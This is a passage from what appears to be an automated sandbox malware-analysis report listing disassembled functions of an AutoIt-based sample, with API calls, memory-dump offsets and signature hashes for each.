                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: cea7ae9e83d3350223f1d459506ba32f4636b1e782c082659f6ee6ade6787605
                                                        • Instruction ID: 6ea387af68a1e272de9912c613b9113c0039cac12741d03169e726c1dfc29818
                                                        • Opcode Fuzzy Hash: cea7ae9e83d3350223f1d459506ba32f4636b1e782c082659f6ee6ade6787605
                                                        • Instruction Fuzzy Hash: 31616D75A01229EFCB15DF94D895EAEB7B4FF08710F10406AF916EB291DB74AE80CB50
                                                        Function 007D2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 007D2968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 007D2981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: ea2075f30fad4d57a3051085caf3a7453b4f595682a6c61f3f36270e05a3322e
                                                        • Instruction ID: bebb10210f9e6803b1e2f4ebb103a28a05a4fe51be50f9884c10227753e3142a
                                                        • Opcode Fuzzy Hash: ea2075f30fad4d57a3051085caf3a7453b4f595682a6c61f3f36270e05a3322e
                                                        • Instruction Fuzzy Hash: 9D514672408744DBD360EF10D88ABAFBBE8FF85344F42885DF2D9421A1DB748569CB66
                                                        Function 00829734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C4F0B: __fread_nolock.LIBCMT ref: 007C4F29
                                                        • _wcscmp.LIBCMT ref: 00829824
                                                        • _wcscmp.LIBCMT ref: 00829837
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 22c1330b225c3c0ac9805a8b34b033b09faec20e58c59add297195003f762727
                                                        • Instruction ID: 2600d4bdf8ca0ccf1c6b03f3225fa7af4f214a5b65e2658c65ec35c4ff04a352
                                                        • Opcode Fuzzy Hash: 22c1330b225c3c0ac9805a8b34b033b09faec20e58c59add297195003f762727
                                                        • Instruction Fuzzy Hash: 5841D571A00219BADF209AA5DC49FEFBBFDEF85710F04007DF904E7280DA759A448B61
                                                        Function 0083258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0083259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008325D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: 812f8d82df0b37abdccc38f1e07fd69f45b17e674b615661f4400a42cc371ef2
                                                        • Instruction ID: 999228a599271891612d90c5d7fadc181de506b6ec42a72527b0c3348f6db848
                                                        • Opcode Fuzzy Hash: 812f8d82df0b37abdccc38f1e07fd69f45b17e674b615661f4400a42cc371ef2
                                                        • Instruction Fuzzy Hash: EE31F671801119EBCF05EFA5CC8AEEEBFB8FF18310F100069E915A6162EA355956DFA0
                                                        Function 00846A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00846B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00846B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 4b3e2e797dab8ddc98d1bebcf7d76f803ea26cbdfe5e1b4c64a859b5f072844c
                                                        • Instruction ID: 39e1959c386968caa800d59d7631364533aa566273a90b84c19585717940ee15
                                                        • Opcode Fuzzy Hash: 4b3e2e797dab8ddc98d1bebcf7d76f803ea26cbdfe5e1b4c64a859b5f072844c
                                                        • Instruction Fuzzy Hash: 3C318D71200608AEDB109F68CC80BFB77A9FF49764F10861DF9A5D7190EA34AC91C761
                                                        Function 008228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0082294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: afbbfe3593f4d860825a364a8c43a6a9eb981871fbb3dbdf35f6b93df68ceb4b
                                                        • Instruction ID: 073a9722e7a590ad32f3849bb830e5bafde9126d936cb52c239b89ae5b8fef3e
                                                        • Opcode Fuzzy Hash: afbbfe3593f4d860825a364a8c43a6a9eb981871fbb3dbdf35f6b93df68ceb4b
                                                        • Instruction Fuzzy Hash: 0C31BF31A00329BBEB28CE58E885FAEBFA8FF45350F140069E985E61A1D77099C4CB51
                                                        Function 008339E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00833A66
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: 2b6d578a0c7286b63eda8cf729ab0234e2356f3678e0d9c5394db4d571223d56
                                                        • Instruction ID: bbfccc389e6a51466012f2a8ce25bcbd329b1e4bda4085f54da1ac893e81674a
                                                        • Opcode Fuzzy Hash: 2b6d578a0c7286b63eda8cf729ab0234e2356f3678e0d9c5394db4d571223d56
                                                        • Instruction Fuzzy Hash: C4215E31600219EACF14EF64CC8AEAE77A9FF94710F504458E559EB281DA38EA45CBA1
                                                        Function 007C16DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetParent.USER32(?), ref: 007FB7BA
                                                        • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,007C19B3,?,?,?,00000006,?), ref: 007FB834
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$ParentProc
                                                        • String ID: 0R
                                                        • API String ID: 2181805148-1916035689
                                                        • Opcode ID: cd0472c631ad67a3dce0e750965e78eb9e6f19bf533e488598bd08823efaae58
                                                        • Instruction ID: 992270b5ed771104a23704873b27047244b9ad65e33e77ef5572d80a70deb2bb
                                                        • Opcode Fuzzy Hash: cd0472c631ad67a3dce0e750965e78eb9e6f19bf533e488598bd08823efaae58
                                                        • Instruction Fuzzy Hash: 11219638601508AFCB109F28C988EB93B96EF4A320F98426DF6255B3F3C7355D51DB50
                                                        Function 008466D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00846761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0084676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 246dc32d6ce8b15c378a70456290cb3487d7fb76549b87d89c92e7ccdcd99087
                                                        • Instruction ID: bf4faa8c452eea6ccd7b6a868fd0b06106da12f31ba5910a6bcbfde93fc4451b
                                                        • Opcode Fuzzy Hash: 246dc32d6ce8b15c378a70456290cb3487d7fb76549b87d89c92e7ccdcd99087
                                                        • Instruction Fuzzy Hash: 8B11907520020CAFEF119F54CC80EBB376AFB4A3A8F114229F918D7291E635DC6187A1
                                                        Function 008496F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
                                                        • Opcode ID: 3ac293f9e16ae60bbb6fffa5e3cf0d96756e53de4d2d5ddf1cfdea6694fc5d71
                                                        • Instruction ID: 13d9240546cda840bf880364a7a46da02013f85633e9035bcbacf1792e9ba8ef
                                                        • Opcode Fuzzy Hash: 3ac293f9e16ae60bbb6fffa5e3cf0d96756e53de4d2d5ddf1cfdea6694fc5d71
                                                        • Instruction Fuzzy Hash: 6D217F3512420CBFEB209F58CC45FBB37A4FB09324F404169FA96DA1E1D671EA10DB60
                                                        Function 00846C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00846C71
                                                        • GetSysColor.USER32(00000012), ref: 00846C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: f36c793271f7886e090cef456a526b3df7d95e6f14f8014f7fb07ea09627d117
                                                        • Instruction ID: a4926281e5dafb76ad314bd340d767bc05dc9df856a9c6a3929a5b2d86d456df
                                                        • Opcode Fuzzy Hash: f36c793271f7886e090cef456a526b3df7d95e6f14f8014f7fb07ea09627d117
                                                        • Instruction Fuzzy Hash: B7212676610209AFDF04DFA8CC85EFA7BB8FB09314F014629FE95D2251E635E860DB61
                                                        Function 0084678B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateMenuPopup
                                                        • String ID: 0R
                                                        • API String ID: 3826294624-1916035689
                                                        • Opcode ID: 245604883e9c66b49d6a68df0e631ba405e7d44e896de1aa2b6dbfb8769ce1fb
                                                        • Instruction ID: 3e7f3a25f82bdf023de8ddcc303b208f82b8bc94a60a557de9df62533b4b1dcb
                                                        • Opcode Fuzzy Hash: 245604883e9c66b49d6a68df0e631ba405e7d44e896de1aa2b6dbfb8769ce1fb
                                                        • Instruction Fuzzy Hash: C8215C7850060DDFCB20CF28C444B96BBE1FB0A324F44866AE859DB391E731AC66CF52
                                                        Function 00846920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 008469A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008469B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: d5e70914cdcf25f1de7f0eaee4c7c8494f81c230ec231bf71718941ffe70ade4
                                                        • Instruction ID: 518b67513b22d2cd96496097cd0c39c6ce9cd002025917b39ec65959be35a04c
                                                        • Opcode Fuzzy Hash: d5e70914cdcf25f1de7f0eaee4c7c8494f81c230ec231bf71718941ffe70ade4
                                                        • Instruction Fuzzy Hash: 3F116D7111020DABEB108E749C44AAB3FA9FB06378F504728F9A5D61E0D6B5DCA19761
                                                        Function 008229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00822A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: e60a0ad63a5f7152d625dadde72531cc3d5811199a12edd5d0196404d8381887
                                                        • Instruction ID: 2df1ae3dba3db617e89e16a129eed6f90137979fa6291ea91cfb3bf0f998a71d
                                                        • Opcode Fuzzy Hash: e60a0ad63a5f7152d625dadde72531cc3d5811199a12edd5d0196404d8381887
                                                        • Instruction Fuzzy Hash: 0811E232D01138BBCB34DB9CEC44BAA77B9FB45314F044021E956EB290D770AE8AC791
                                                        Function 008321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0083222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00832255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 2af7eac15e2e4ae0719b7cd483c5a316375c1e56b90a147daf0669c5062ab342
                                                        • Instruction ID: cf22b60f7b49fea599833c1289cbc7cce59dc883588343bc247722c6ae06d7b9
                                                        • Opcode Fuzzy Hash: 2af7eac15e2e4ae0719b7cd483c5a316375c1e56b90a147daf0669c5062ab342
                                                        • Instruction Fuzzy Hash: 6811CE70541229BADB258F518C88EBBFBA8FF96765F10822AFA15C6100D3706990D6F0
                                                        Function 008484E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?), ref: 00848530
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: 0R
                                                        • API String ID: 3850602802-1916035689
                                                        • Opcode ID: 40d20385b2082a80644ef0567dff86b8cee90b47857b675075d4ce2d487fa11f
                                                        • Instruction ID: 8238922a97769ed3756d68e632c9d1135fde56520b2d4070aca856a84b69ad46
                                                        • Opcode Fuzzy Hash: 40d20385b2082a80644ef0567dff86b8cee90b47857b675075d4ce2d487fa11f
                                                        • Instruction Fuzzy Hash: 6221B379A0020DEFCB15DF98D8408AE7BB5FB4D354B014159FE06E7360DA31AD61DBA0
                                                        Function 007C2327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0R
                                                        • API String ID: 0-1916035689
                                                        • Opcode ID: e9d34621bd3bd6dea62b4df756ed693500ae11767686a00c769ca3a3dde84fbb
                                                        • Instruction ID: 4478a7e888909b1b8fb8b67d6aab75587d80a64d42f39cbf996a5f6d0664510a
                                                        • Opcode Fuzzy Hash: e9d34621bd3bd6dea62b4df756ed693500ae11767686a00c769ca3a3dde84fbb
                                                        • Instruction Fuzzy Hash: 2B112B34604604AFCB20DF28CC80EA57BE6BF49320F148269FA699B3A1C775E941CF90
                                                        Function 00818E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00818E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
